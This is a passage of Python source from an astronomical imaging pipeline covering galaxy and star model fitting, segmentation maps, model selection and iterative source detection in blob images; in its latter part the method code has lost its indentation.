            Ibright = _argsort_by_brightness(cat, self.bands, ref_first=True)
            if len(cat) > 1:
                self._optimize_individual_sources_subtract(
                    cat, Ibright, B.cpu_source)
            else:
                self._optimize_individual_sources(tr, cat, Ibright, B.cpu_source)
            if self.plots:
                import pylab as plt
                modimgs = list(tr.getModelImages())
                co,_ = quick_coadds(self.tims, self.bands, self.blobwcs,
                                    images=modimgs)
                plt.clf()
                dimshow(get_rgb(co, self.bands))
                plt.title('After final opt')
                self.ps.savefig()
        if compute_metrics:
            # Compute variances on all parameters for the kept model
            B.srcinvvars = [None for i in range(len(B))]
            cat.thawAllRecursive()
            cat.freezeAllParams()
            # Thaw one source at a time so getDerivs() returns only that
            # source's parameter derivatives.
            for isub in range(len(B.sources)):
                cat.thawParam(isub)
                src = cat[isub]
                if src is None:
                    cat.freezeParam(isub)
                    continue
                # Convert to "vanilla" ellipse parameterization
                nsrcparams = src.numberOfParams()
                _convert_ellipses(src)
                assert(src.numberOfParams() == nsrcparams)
                # Compute inverse-variances
                allderivs = tr.getDerivs()
                ivars = _compute_invvars(allderivs)
                assert(len(ivars) == nsrcparams)
                B.srcinvvars[isub] = ivars
                assert(len(B.srcinvvars[isub]) == cat[isub].numberOfParams())
                cat.freezeParam(isub)
            # Check for sources with zero inverse-variance -- I think these
            # can be generated during the "Simultaneous re-opt" stage above --
            # sources can get scattered outside the blob.
            I, = np.nonzero([np.sum(iv) > 0 for iv in B.srcinvvars])
            if len(I) < len(B):
                debug('Keeping', len(I), 'of', len(B),'sources with non-zero ivar')
                B.cut(I)
                cat = Catalog(*B.sources)
                tr.catalog = cat
            M = _compute_source_metrics(B.sources, self.tims, self.bands, tr)
            for k,v in M.items():
                B.set(k, v)
        info('Blob', self.name, 'finished, total:', Time()-trun)
        return B
    def compute_segmentation_map(self):
        """Build self.segmap, assigning each blob pixel to (at most) one source.

        Uses an approximate saddle-point criterion: thresholding the max
        per-band detection S/N map at increasing levels, a source claims its
        connected region once it is the highest-ranked (brightest) source in
        that region.  Pixels in the CLUSTER reference mask are excluded.
        Finally, each source is guaranteed a small exclusive radius around
        its center, with contested pixels going to the nearest source.
        """
        # Use ~ saddle criterion to segment the blob / mask other sources
        from functools import reduce
        from legacypipe.detection import detection_maps
        from astrometry.util.multiproc import multiproc
        from scipy.ndimage.morphology import binary_dilation, binary_fill_holes
        from scipy.ndimage.measurements import label
        # Compute per-band detection maps
        mp = multiproc()
        detmaps,detivs,satmaps = detection_maps(
            self.tims, self.blobwcs, self.bands, mp)
        # same as in runbrick.py
        saturated_pix = reduce(np.logical_or,
                               [binary_dilation(satmap > 0, iterations=4) for satmap in satmaps])
        del satmaps
        maxsn = 0
        for i,(detmap,detiv) in enumerate(zip(detmaps,detivs)):
            sn = detmap * np.sqrt(detiv)
            if self.plots:
                import pylab as plt
                plt.clf()
                plt.subplot(2,2,1)
                plt.imshow(detmap, interpolation='nearest', origin='lower')
                plt.title('detmap %s' % self.bands[i])
                plt.colorbar()
                plt.subplot(2,2,2)
                plt.imshow(detiv, interpolation='nearest', origin='lower')
                plt.title('detiv %s' % self.bands[i])
                plt.colorbar()
                plt.subplot(2,2,3)
                plt.imshow(sn, interpolation='nearest', origin='lower')
                plt.title('detsn %s' % self.bands[i])
                plt.colorbar()
                self.ps.savefig()
            # HACK - no SEDs...
            maxsn = np.maximum(maxsn, sn)
        if self.plots:
            plt.clf()
            plt.imshow(saturated_pix, interpolation='nearest', origin='lower',
                       vmin=0, vmax=1, cmap='gray')
            plt.title('saturated pix')
            self.ps.savefig()
            plt.clf()
            plt.imshow(maxsn, interpolation='nearest', origin='lower')
            plt.title('max s/n for segmentation')
            self.ps.savefig()
        # -1 means "unassigned" in the segmentation map.
        segmap = np.empty((self.blobh, self.blobw), int)
        segmap[:,:] = -1
        _,ix,iy = self.blobwcs.radec2pixelxy(
            np.array([src.getPosition().ra for src in self.srcs]),
            np.array([src.getPosition().dec for src in self.srcs]))
        ix = np.clip(np.round(ix)-1, 0, self.blobw-1).astype(int)
        iy = np.clip(np.round(iy)-1, 0, self.blobh-1).astype(int)
        # Do not compute segmentation map for sources in the CLUSTER mask
        Iseg, = np.nonzero((self.refmap[iy, ix] & IN_BLOB['CLUSTER']) == 0)
        # Zero out the S/N in CLUSTER mask
        maxsn[(self.refmap & IN_BLOB['CLUSTER']) > 0] = 0.
        # (also zero out the satmap)
        saturated_pix[(self.refmap & IN_BLOB['CLUSTER']) > 0] = False
        Ibright = _argsort_by_brightness([self.srcs[i] for i in Iseg], self.bands)
        # rank[i] = brightness rank of the i-th segmented source (0 = brightest)
        rank = np.empty(len(Iseg), int)
        rank[Ibright] = np.arange(len(Iseg), dtype=int)
        rankmap = dict([(Iseg[i],r) for r,i in enumerate(Ibright)])
        todo = set(Iseg)
        # Raise the S/N threshold until each source is the dominant one in
        # its own connected component (or runs out of thresholds).
        thresholds = list(range(3, int(np.ceil(maxsn.max()))))
        for thresh in thresholds:
            #print('S/N', thresh, ':', len(todo), 'sources to find still')
            if len(todo) == 0:
                break
            ####
            hot = np.logical_or(maxsn >= thresh, saturated_pix)
            hot = binary_fill_holes(hot)
            blobs,_ = label(hot)
            srcblobs = blobs[iy[Iseg], ix[Iseg]]
            done = set()
            # Collect the brightness ranks of the sources in each component.
            blobranks = {}
            for i,(b,r) in enumerate(zip(srcblobs, rank)):
                if not b in blobranks:
                    blobranks[b] = []
                blobranks[b].append(r)
            for t in todo:
                bl = blobs[iy[t], ix[t]]
                if bl == 0:
                    # ??
                    done.add(t)
                    continue
                if rankmap[t] == min(blobranks[bl]):
                    #print('Source', t, 'has rank', rank[t], 'vs blob ranks', blobranks[bl])
                    segmap[blobs == bl] = t
                    #print('Source', t, 'is isolated at S/N', thresh)
                    done.add(t)
            todo.difference_update(done)
        del hot, maxsn, saturated_pix
        # ensure that each source owns a tiny radius around its center in the segmentation map.
        # If there is more than one source in that radius, each pixel gets assigned to its nearest source.
        # record the current distance to nearest source
        kingdom = np.empty(segmap.shape, np.uint8)
        kingdom[:,:,] = 255
        H,W = segmap.shape
        xcoords = np.arange(W)
        ycoords = np.arange(H)
        for i in Ibright:
            radius = 5
            x,y = ix[i], iy[i]
            yslc = slice(max(0, y-radius), min(H, y+radius+1))
            xslc = slice(max(0, x-radius), min(W, x+radius+1))
            slc = (yslc, xslc)
            # Radius to nearest earlier source
            oldr = kingdom[slc]
            # Radius to new source
            newr = np.hypot(xcoords[np.newaxis, xslc] - x, ycoords[yslc, np.newaxis] - y)
            assert(newr.shape == oldr.shape)
            newr = (newr + 0.5).astype(np.uint8)
            # Pixels that are within range and closer to this source than any other.
            owned = (newr <= radius) * (newr < oldr)
            segmap[slc][owned] = i
            kingdom[slc][owned] = newr[owned]
        del kingdom, xcoords, ycoords
        self.segmap = segmap
        if self.plots:
            import pylab as plt
            plt.clf()
            dimshow(segmap)
            ax = plt.axis()
            from legacypipe.detection import plot_boundary_map
            plot_boundary_map(segmap >= 0)
            plt.plot(ix, iy, 'r.')
            plt.axis(ax)
            plt.title('Segmentation map')
            self.ps.savefig()
            plt.clf()
            dimshow(self.rgb)
            ax = plt.axis()
            for i in range(len(self.srcs)):
                plot_boundary_map(segmap == i)
            plt.plot(ix, iy, 'r.')
            plt.axis(ax)
            plt.title('Segments')
            self.ps.savefig()
    def run_model_selection(self, cat, Ibright, B, iterative_detection=True):
        """Select the best model type for each source, brightest first.

        While one source is being fit, initial models of all other sources
        are subtracted from the images; the selected model replaces the
        initial one afterwards.  Optionally runs iterative detection on the
        residuals and merges any newly found sources into B.

        Returns the (possibly extended) measurement table B; kept sources
        are stored in B.sources (None for dropped sources).
        """
        # We compute & subtract initial models for the other sources while
        # fitting each source:
        # -Remember the original images
        # -Compute initial models for each source (in each tim)
        # -Subtract initial models from images
        # -During fitting, for each source:
        #   -add back in the source's initial model (to each tim)
        #   -fit, with Catalog([src])
        #   -subtract final model (from each tim)
        # -Replace original images
        models = SourceModels()
        # Remember original tim images
        models.save_images(self.tims)
        # Create initial models for each tim x each source
        models.create(self.tims, cat, subtract=True)
        N = len(cat)
        B.dchisq = np.zeros((N, 5), np.float32)
        B.all_models = np.array([{} for i in range(N)])
        B.all_model_ivs = np.array([{} for i in range(N)])
        B.all_model_cpu = np.array([{} for i in range(N)])
        B.all_model_hit_limit = np.array([{} for i in range(N)])
        B.all_model_opt_steps = np.array([{} for i in range(N)])
        # Model selection for sources, in decreasing order of brightness
        for numi,srci in enumerate(Ibright):
            src = cat[srci]
            debug('Model selection for source %i of %i in blob %s; sourcei %i' %
                  (numi+1, len(Ibright), self.name, srci))
            cpu0 = time.process_time()
            # Frozen (e.g. reference) sources skip model selection entirely.
            if getattr(src, 'freezeparams', False):
                info('Frozen source', src, '-- keeping as-is!')
                B.sources[srci] = src
                continue
            # Add this source's initial model back in.
            models.add(srci, self.tims)
            if self.plots_single:
                import pylab as plt
                plt.figure(2)
                coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
                                           fill_holes=False)
                rgb = get_rgb(coimgs,self.bands)
                plt.imsave('blob-%s-%s-bdata.png' % (self.name, srci), rgb,
                           origin='lower')
                plt.figure(1)
            # Model selection for this source.
            keepsrc = self.model_selection_one_source(src, srci, models, B)
            B.sources[srci] = keepsrc
            cat[srci] = keepsrc
            # Subtract the selected model so later sources fit against it.
            models.update_and_subtract(srci, keepsrc, self.tims)
            if self.plots_single:
                plt.figure(2)
                tr = self.tractor(self.tims, cat)
                coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
                                           fill_holes=False)
                dimshow(get_rgb(coimgs,self.bands), ticks=False)
                plt.savefig('blob-%s-%i-sub.png' % (self.name, srci))
                plt.figure(1)
            cpu1 = time.process_time()
            B.cpu_source[srci] += (cpu1 - cpu0)
        # At this point, we have subtracted our best model fits for each source
        # to be kept; the tims contain residual images.
        if iterative_detection:
            if self.plots and False:
                # One plot per tim is a little much, even for me...
                import pylab as plt
                for tim in self.tims:
                    plt.clf()
                    plt.suptitle('Iterative detection: %s' % tim.name)
                    plt.subplot(2,2,1)
                    plt.imshow(tim.getImage(), interpolation='nearest', origin='lower',
                               vmin=-5.*tim.sig1, vmax=10.*tim.sig1)
                    plt.title('image')
                    plt.subplot(2,2,2)
                    plt.imshow(tim.getImage(), interpolation='nearest', origin='lower')
                    plt.title('image')
                    plt.colorbar()
                    plt.subplot(2,2,3)
                    plt.imshow(tim.getInvError(), interpolation='nearest', origin='lower')
                    plt.title('inverr')
                    plt.colorbar()
                    plt.subplot(2,2,4)
                    plt.imshow(tim.getImage() * (tim.getInvError() > 0), interpolation='nearest', origin='lower')
                    plt.title('image*(inverr>0)')
                    plt.colorbar()
                    self.ps.savefig()
            Bnew = self.iterative_detection(B, models)
            if Bnew is not None:
                from astrometry.util.fits import merge_tables
                # B.sources is a list of objects... merge() with
                # fillzero doesn't handle them well.
                srcs = B.sources
                newsrcs = Bnew.sources
                B.delete_column('sources')
                Bnew.delete_column('sources')
                # also scalars don't work well
                iblob = B.iblob
                B.delete_column('iblob')
                B = merge_tables([B, Bnew], columns='fillzero')
                B.sources = srcs + newsrcs
                B.iblob = iblob
        models.restore_images(self.tims)
        del models
        return B
    def iterative_detection(self, Bold, models):
        """Detect and measure new sources in the residual images.

        Runs SED-matched detection on the residuals (the tims currently hold
        image minus first-round models), vetoes detections near existing
        sources or in the reference map, cuts detections whose residual S/N
        is not significant compared to the first-round model S/N, then runs
        the whole OneBlob pipeline recursively on the surviving new sources.

        Returns a fits_table of new-source measurements, or None if nothing
        new survives.
        """
        # Compute per-band detection maps
        from legacypipe.detection import sed_matched_filters, detection_maps, run_sed_matched_filters
        from astrometry.util.multiproc import multiproc
        if self.plots:
            coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
                                       fill_holes=False)
            import pylab as plt
            plt.clf()
            dimshow(get_rgb(coimgs,self.bands), ticks=False)
            plt.title('Iterative detection: residuals')
            self.ps.savefig()
        mp = multiproc()
        detmaps,detivs,satmaps = detection_maps(
            self.tims, self.blobwcs, self.bands, mp)
        # from runbrick.py
        from scipy.ndimage.morphology import binary_dilation
        satmaps = [binary_dilation(satmap > 0, iterations=4) for satmap in satmaps]
        # Also compute detection maps on the (first-round) model images!
        # save tim.images (= residuals at this point)
        realimages = [tim.getImage() for tim in self.tims]
        # Temporarily replace each tim's pixels with its summed model image.
        for tim,mods in zip(self.tims, models.models):
            modimg = np.zeros_like(tim.getImage())
            for mod in mods:
                if mod is None:
                    continue
                mod.addTo(modimg)
            tim.data = modimg
        if self.plots:
            coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
                                       fill_holes=False)
            import pylab as plt
            plt.clf()
            dimshow(get_rgb(coimgs,self.bands), ticks=False)
            plt.title('Iterative detection: first-round models')
            self.ps.savefig()
        mod_detmaps,mod_detivs,_ = detection_maps(
            self.tims, self.blobwcs, self.bands, mp)
        # revert
        for tim,img in zip(self.tims, realimages):
            tim.data = img
        if self.plots:
            import pylab as plt
            plt.clf()
            dimshow(get_rgb(detmaps,self.bands), ticks=False)
            plt.title('Iterative detection: detection maps')
            self.ps.savefig()
            plt.clf()
            dimshow(get_rgb(mod_detmaps,self.bands), ticks=False)
            plt.title('Iterative detection: model detection maps')
            self.ps.savefig()
        # if self.plots:
        #     import pylab as plt
        #     plt.clf()
        #     for det,div,b in zip(detmaps, detivs, self.bands):
        #         plt.hist((det * np.sqrt(div)).ravel(), range=(-5,10),
        #                  bins=50, histtype='step', color=dict(z='m').get(b, b))
        #     plt.title('Detection pixel S/N')
        #     self.ps.savefig()
        # Quiet the detection module's logging during this nested run.
        detlogger = logging.getLogger('legacypipe.detection')
        detloglvl = detlogger.getEffectiveLevel()
        detlogger.setLevel(detloglvl + 10)
        SEDs = sed_matched_filters(self.bands)
        # Avoid re-detecting sources at positions close to initial
        # source positions (including ones that will get cut!)
        avoid_x = Bold.init_x
        avoid_y = Bold.init_y
        avoid_r = np.zeros(len(avoid_x), np.float32) + 2.
        nsigma = 6.
        Tnew,newcat,_ = run_sed_matched_filters(
            SEDs, self.bands, detmaps, detivs, (avoid_x,avoid_y,avoid_r),
            self.blobwcs, nsigma=nsigma, saturated_pix=satmaps, veto_map=None,
            plots=False, ps=None, mp=mp)
            #plots=self.plots, ps=self.ps, mp=mp)
        detlogger.setLevel(detloglvl)
        if Tnew is None:
            debug('No iterative sources detected!')
            return None
        debug('Found', len(Tnew), 'new sources')
        Tnew.cut(self.refmap[Tnew.iby, Tnew.ibx] == 0)
        debug('Cut to', len(Tnew), 'on refmap')
        if len(Tnew) == 0:
            return None
        # Compare detection S/N (residuals) against the model S/N at each
        # new-source position, both max-over-bands and sum-over-bands.
        detsns = np.dstack([m*np.sqrt(iv) for m,iv in zip(detmaps, detivs)])
        modsns = np.dstack([m*np.sqrt(iv) for m,iv in zip(mod_detmaps, mod_detivs)])
        det_max = np.max(detsns[Tnew.iby, Tnew.ibx, :], axis=1)
        mod_max = np.max(modsns[Tnew.iby, Tnew.ibx, :], axis=1)
        det_sum = np.sum(detsns[Tnew.iby, Tnew.ibx, :], axis=1)
        mod_sum = np.sum(modsns[Tnew.iby, Tnew.ibx, :], axis=1)
        del detsns, modsns
        if self.plots:
            coimgs,cons = quick_coadds(self.tims, self.bands, self.blobwcs,
                                       fill_holes=False)
            import pylab as plt
            plt.clf()
            dimshow(get_rgb(coimgs,self.bands), ticks=False)
            ax = plt.axis()
            crossa = dict(ms=10, mew=1.5)
            rr = np.array([s.getPosition().ra  for s in Bold.sources
                           if s is not None])
            dd = np.array([s.getPosition().dec for s in Bold.sources
                           if s is not None])
            _,xx,yy = self.blobwcs.radec2pixelxy(rr, dd)
            plt.plot(Bold.init_x, Bold.init_y, 'o', ms=5, mec='r', mfc='none', label='Avoid (r=2)')
            plt.plot(xx-1, yy-1, 'r+', label='Old', **crossa)
            plt.plot(Tnew.ibx, Tnew.iby, '+', color=(0,1,0), label='New',
                     **crossa)
            plt.axis(ax)
            plt.legend()
            plt.title('Iterative detections')
            self.ps.savefig()
            plt.clf()
            plt.loglog(mod_max, det_max, 'k.')
            ax = plt.axis()
            plt.plot([1e-3, 1e6], [1e-3, 1e6], 'b--', lw=3, alpha=0.3)
            plt.axis(ax)
            plt.xlabel('Model detection S/N: max')
            plt.ylabel('Iterative detection S/N: max')
            self.ps.savefig()
            plt.clf()
            plt.loglog(mod_sum, det_sum, 'k.')
            ax = plt.axis()
            plt.plot([1e-3, 1e6], [1e-3, 1e6], 'b--', lw=3, alpha=0.3)
            plt.axis(ax)
            plt.xlabel('Model detection S/N: sum')
            plt.ylabel('Iterative detection S/N: sum')
            self.ps.savefig()
            plt.clf()
            dimshow(get_rgb(coimgs,self.bands), ticks=False)
            ax = plt.axis()
            crossa = dict(ms=10, mew=1.5)
            plt.plot(xx-1, yy-1, 'r+', label='Old', **crossa)
            plt.plot(Tnew.ibx, Tnew.iby, '+', color=(0,1,0), label='New',
                     **crossa)
            for x,y,r1,r2 in zip(Tnew.ibx, Tnew.iby, det_max/np.maximum(mod_max, 1.), det_sum/np.maximum(mod_sum, len(self.bands))):
                plt.text(x, y, '%.1f, %.1f' % (r1,r2),
                         color='k', fontsize=10,
                         bbox=dict(facecolor='w', alpha=0.5))
            plt.axis(ax)
            plt.legend()
            plt.title('Iterative detections')
            self.ps.savefig()
        # Keep detections whose residual S/N exceeds this fraction of the
        # model S/N.  (NB: local name 'B' here is just a scalar threshold,
        # not the measurement table used elsewhere.)
        B = 0.2
        Tnew.cut(det_max > B * np.maximum(mod_max, 1.))
        debug('Cut to', len(Tnew), 'iterative sources compared to model detection map')
        if len(Tnew) == 0:
            return None
        info('Measuring', len(Tnew), 'iterative sources')
        from tractor import NanoMaggies, RaDecPos
        # New sources start as point sources with unit flux in each band.
        newsrcs = [PointSource(RaDecPos(t.ra, t.dec),
                               NanoMaggies(**dict([(b,1) for b in self.bands])))
                   for t in Tnew]
        # Save
        oldsrcs = self.srcs
        self.srcs = newsrcs
        Bnew = fits_table()
        Bnew.sources = newsrcs
        Bnew.Isrcs = np.array([-1]*len(Bnew))
        Bnew.cpu_source = np.zeros(len(Bnew), np.float32)
        Bnew.blob_symm_nimages = np.zeros(len(Bnew), np.int16)
        Bnew.blob_symm_npix = np.zeros(len(Bnew), np.int32)
        Bnew.blob_symm_width = np.zeros(len(Bnew), np.int16)
        Bnew.blob_symm_height = np.zeros(len(Bnew), np.int16)
        Bnew.hit_limit = np.zeros(len(Bnew), bool)
        Bnew.brightblob = self.refmap[Tnew.iby, Tnew.ibx].astype(np.int16)
        # Be quieter during iterative detection!
        bloblogger = logging.getLogger('legacypipe.oneblob')
        loglvl = bloblogger.getEffectiveLevel()
        bloblogger.setLevel(loglvl + 10)
        # Run the whole oneblob pipeline on the iterative sources!
        # (iterative_detection=False prevents unbounded recursion.)
        Bnew = self.run(Bnew, iterative_detection=False, compute_metrics=False)
        bloblogger.setLevel(loglvl)
        # revert
        self.srcs = oldsrcs
        if len(Bnew) == 0:
            return None
        return Bnew
def model_selection_one_source(self, src, srci, models, B):
if self.bigblob:
mods = [mod[srci] for mod in models.models]
srctims,modelMasks = _get_subimages(self.tims, mods, src)
# Create a little local WCS subregion for this source, by
# resampling non-zero inverrs from the srctims into blobwcs
insrc = np.zeros((self.blobh,self.blobw), bool)
for tim in srctims:
try:
Yo,Xo,Yi,Xi,nil = resample_with_wcs(
self.blobwcs, tim.subwcs, intType=np.int16)
except:
continue
insrc[Yo,Xo] |= (tim.inverr[Yi,Xi] > 0)
if np.sum(insrc) == 0:
# No source pixels touching blob... this can
# happen when a source scatters outside the blob
# in the fitting stage. Drop the source here.
return None
yin = np.max(insrc, axis=1)
xin = np.max(insrc, axis=0)
yl,yh = np.flatnonzero(yin)[np.array([0,-1])]
xl,xh = np.flatnonzero(xin)[np.array([0,-1])]
del insrc
srcwcs = self.blobwcs.get_subimage(xl, yl, 1+xh-xl, 1+yh-yl)
srcwcs_x0y0 = (xl, yl)
# A mask for which pixels in the 'srcwcs' square are occupied.
srcblobmask = self.blobmask[yl:yh+1, xl:xh+1]
else:
modelMasks = models.model_masks(srci, src)
srctims = self.tims
srcwcs = self.blobwcs
srcwcs_x0y0 = (0, 0)
srcblobmask = self.blobmask
if self.plots_per_source:
# This is a handy blob-coordinates plot of the data
# going into the fit.
import pylab as plt
plt.clf()
nil,nil,coimgs,nil = quick_coadds(srctims, self.bands,self.blobwcs,
fill_holes=False, get_cow=True)
dimshow(get_rgb(coimgs, self.bands))
ax = plt.axis()
pos = src.getPosition()
ok,x,y = self.blobwcs.radec2pixelxy(pos.ra, pos.dec)
ix,iy = int(np.round(x-1)), int(np.round(y-1))
plt.plot(x-1, y-1, 'r+')
plt.axis(ax)
plt.title('Model selection: data')
self.ps.savefig()
# Mask out other sources while fitting this one, by
# finding symmetrized blobs of significant pixels
mask_others = True
if mask_others:
from legacypipe.detection import detection_maps
from astrometry.util.multiproc import multiproc
from scipy.ndimage.morphology import binary_dilation, binary_fill_holes
from scipy.ndimage.measurements import label
# Compute per-band detection maps
mp = multiproc()
detmaps,detivs,_ = detection_maps(
srctims, srcwcs, self.bands, mp)
# Compute the symmetric area that fits in this 'tim'
pos = src.getPosition()
ok,xx,yy = srcwcs.radec2pixelxy(pos.ra, pos.dec)
bh,bw = srcblobmask.shape
ix = int(np.clip(np.round(xx-1), 0, bw-1))
iy = int(np.clip(np.round(yy-1), 0, bh-1))
flipw = min(ix, bw-1-ix)
fliph = min(iy, bh-1-iy)
flipblobs = np.zeros(srcblobmask.shape, bool)
# The slice where we can perform symmetrization
slc = (slice(iy-fliph, iy+fliph+1),
slice(ix-flipw, ix+flipw+1))
# Go through the per-band detection maps, marking significant pixels
for i,(detmap,detiv) in enumerate(zip(detmaps,detivs)):
sn = detmap * np.sqrt(detiv)
flipsn = np.zeros_like(sn)
# Symmetrize
flipsn[slc] = np.minimum(sn[slc],
np.flipud(np.fliplr(sn[slc])))
# just OR the detection maps per-band...
flipblobs |= (flipsn > 5.)
flipblobs = binary_fill_holes(flipblobs)
blobs,_ = label(flipblobs)
goodblob = blobs[iy,ix]
if self.plots_per_source and True:
# This plot is about the symmetric-blob definitions
# when fitting sources.
import pylab as plt
from legacypipe.detection import plot_boundary_map
plt.clf()
for i,(band,detmap,detiv) in enumerate(zip(self.bands, detmaps, detivs)):
if i >= 4:
break
detsn = detmap * np.sqrt(detiv)
plt.subplot(2,2, i+1)
mx = detsn.max()
dimshow(detsn, vmin=-2, vmax=max(8, mx))
ax = plt.axis()
plot_boundary_map(detsn >= 5.)
plt.plot(ix, iy, 'rx')
plt.plot([ix-flipw, ix-flipw, ix+flipw, ix+flipw, ix-flipw],
[iy-fliph, iy+fliph, iy+fliph, iy-fliph, iy-fliph], 'r-')
plt.axis(ax)
plt.title('det S/N: ' + band)
plt.subplot(2,2,4)
dimshow(flipblobs, vmin=0, vmax=1)
plt.colorbar()
ax = plt.axis()
plot_boundary_map(blobs == goodblob)
if binary_fill_holes(flipblobs)[iy,ix]:
fb = (blobs == goodblob)
di = binary_dilation(fb, iterations=4)
if np.any(di):
plot_boundary_map(di, rgb=(255,0,0))
plt.plot(ix, iy, 'rx')
plt.plot([ix-flipw, ix-flipw, ix+flipw, ix+flipw, ix-flipw],
[iy-fliph, iy+fliph, iy+fliph, iy-fliph, iy-fliph], 'r-')
plt.axis(ax)
plt.title('good blob')
self.ps.savefig()
plt.clf()
plt.subplot(2,2,1)
dimshow(blobs)
plt.colorbar()
plt.title('blob map; goodblob=%i' % goodblob)
plt.subplot(2,2,2)
dimshow(flipblobs, vmin=0, vmax=1)
plt.colorbar()
plt.title('symmetric blob mask: 1 = good; red=symm')
ax = plt.axis()
plt.plot(ix, iy, 'rx')
plt.plot([ix-flipw-0.5, ix-flipw-0.5, ix+flipw+0.5, ix+flipw+0.5, ix-flipw-0.5],
[iy-fliph-0.5, iy+fliph+0.5, iy+fliph+0.5, iy-fliph-0.5, iy-fliph-0.5], 'r-')
plt.axis(ax)
plt.subplot(2,2,3)
dh,dw = flipblobs.shape
sx0,sy0 = srcwcs_x0y0
dimshow(self.segmap[sy0:sy0+dh, sx0:sx0+dw])
plt.title('Segmentation map')
plt.subplot(2,2,4)
dilated = binary_dilation(flipblobs, iterations=4)
s = self.segmap[iy + sy0, ix + sx0]
if s != -1:
dilated *= (self.segmap[sy0:sy0+dh, sx0:sx0+dw] == s)
dimshow(dilated)
if s != -1:
plt.title('Dilated goodblob * Segmentation map')
else:
plt.title('Dilated goodblob (no Segmentation map)')
self.ps.savefig()
# If there is no longer a source detected at the original source
# position, we want to drop this source. However, saturation can
# cause there to be no detection S/N because of masking, so do
# a hole-fill before checking.
if not flipblobs[iy,ix]:
# The hole-fill can still fail (eg, in small test images) if
# the bleed trail splits the blob into two pieces.
# Skip this test for reference sources.
if is_reference_source(src):
debug('Reference source center is outside symmetric blob; keeping')
else:
debug('Source center is not in the symmetric blob mask; skipping')
return None
if goodblob != 0:
flipblobs = (blobs == goodblob)
dilated = binary_dilation(flipblobs, iterations=4)
if not np.any(dilated):
debug('No pixels in dilated symmetric mask')
return None
dh,dw = flipblobs.shape
sx0,sy0 = srcwcs_x0y0
s = self.segmap[iy + sy0, ix + sx0]
if s != -1:
dilated *= (self.segmap[sy0:sy0+dh, sx0:sx0+dw] == s)
if not np.any(dilated):
debug('No pixels in segmented dilated symmetric mask')
return None
yin = np.max(dilated, axis=1)
xin = np.max(dilated, axis=0)
yl,yh = np.flatnonzero(yin)[np.array([0,-1])]
xl,xh = np.flatnonzero(xin)[np.array([0,-1])]
(oldx0,oldy0) = srcwcs_x0y0
srcwcs = srcwcs.get_subimage(xl, yl, 1+xh-xl, 1+yh-yl)
srcwcs_x0y0 = (oldx0 + xl, oldy0 + yl)
srcblobmask = srcblobmask[yl:yh+1, xl:xh+1]
dilated = dilated[yl:yh+1, xl:xh+1]
flipblobs = flipblobs[yl:yh+1, xl:xh+1]
saved_srctim_ies = []
keep_srctims = []
mm = []
totalpix = 0
for tim in srctims:
# Zero out inverse-errors for all pixels outside
# 'dilated'.
try:
Yo,Xo,Yi,Xi,nil = resample_with_wcs(
tim.subwcs, srcwcs, intType=np.int16)
except OverlapError:
continue
ie = tim.getInvError()
newie = np.zeros_like(ie)
good, = np.nonzero(dilated[Yi,Xi] * (ie[Yo,Xo] > 0))
if len(good) == 0:
debug('Tim has inverr all == 0')
continue
yy = Yo[good]
xx = Xo[good]
newie[yy,xx] = ie[yy,xx]
xl,xh = xx.min(), xx.max()
yl,yh = yy.min(), yy.max()
totalpix += len(xx)
d = { src: ModelMask(xl, yl, 1+xh-xl, 1+yh-yl) }
mm.append(d)
saved_srctim_ies.append(ie)
tim.inverr = newie
keep_srctims.append(tim)
srctims = keep_srctims
modelMasks = mm
B.blob_symm_nimages[srci] = len(srctims)
B.blob_symm_npix[srci] = totalpix
sh,sw = srcwcs.shape
B.blob_symm_width [srci] = sw
B.blob_symm_height[srci] = sh
# if self.plots_per_source:
# from legacypipe.detection import plot_boundary_map
# plt.clf()
# dimshow(get_rgb(coimgs, self.bands))
# ax = plt.axis()
# plt.plot(x-1, y-1, 'r+')
# plt.axis(ax)
# sx0,sy0 = srcwcs_x0y0
# sh,sw = srcwcs.shape
# ext = [sx0, sx0+sw, sy0, sy0+sh]
# plot_boundary_map(flipblobs, rgb=(255,255,255), extent=ext)
# plot_boundary_map(dilated, rgb=(0,255,0), extent=ext)
# plt.title('symmetrized blobs')
# self.ps.savefig()
# nil,nil,coimgs,nil = quick_coadds(
# srctims, self.bands, self.blobwcs,
# fill_holes=False, get_cow=True)
# dimshow(get_rgb(coimgs, self.bands))
# ax = plt.axis()
# plt.plot(x-1, y-1, 'r+')
# plt.axis(ax)
# plt.title('Symmetric-blob masked')
# self.ps.savefig()
# plt.clf()
# for tim in srctims:
# ie = tim.getInvError()
# sigmas = (tim.getImage() * ie)[ie > 0]
# plt.hist(sigmas, range=(-5,5), bins=21, histtype='step')
# plt.axvline(np.mean(sigmas), alpha=0.5)
# plt.axvline(0., color='k', lw=3, alpha=0.5)
# plt.xlabel('Image pixels (sigma)')
# plt.title('Symmetrized pixel values')
# self.ps.savefig()
# # plot the modelmasks for each tim.
# plt.clf()
# R = int(np.floor(np.sqrt(len(srctims))))
# C = int(np.ceil(len(srctims) / float(R)))
# for i,tim in enumerate(srctims):
# plt.subplot(R, C, i+1)
# msk = modelMasks[i][src].mask
# print('Mask:', msk)
# if msk is None:
# continue
# plt.imshow(msk, interpolation='nearest', origin='lower', vmin=0, vmax=1)
# plt.title(tim.name)
# plt.suptitle('Model Masks')
# self.ps.savefig()
if self.bigblob and self.plots_per_source:
# This is a local source-WCS plot of the data going into the
# fit.
plt.clf()
coimgs,_ = quick_coadds(srctims, self.bands, srcwcs, fill_holes=False)
dimshow(get_rgb(coimgs, self.bands))
plt.title('Model selection: stage1 data (srcwcs)')
self.ps.savefig()
srctractor = self.tractor(srctims, [src])
srctractor.setModelMasks(modelMasks)
srccat = srctractor.getCatalog()
ok,ix,iy = srcwcs.radec2pixelxy(src.getPosition().ra,
src.getPosition().dec)
ix = int(ix-1)
iy = int(iy-1)
# Start in blob
sh,sw = srcwcs.shape
if ix < 0 or iy < 0 or ix >= sw or iy >= sh or not srcblobmask[iy,ix]:
debug('Source is starting outside blob -- skipping.')
if mask_others:
for ie,tim in zip(saved_srctim_ies, srctims):
tim.inverr = ie
return None
from tractor import Galaxy
is_galaxy = isinstance(src, Galaxy)
x0,y0 = srcwcs_x0y0
# Fitting behaviors based on geometric masks.
force_pointsource_mask = (IN_BLOB['BRIGHT'] | IN_BLOB['CLUSTER'])
# large_galaxies_force_pointsource is True by default.
if self.large_galaxies_force_pointsource:
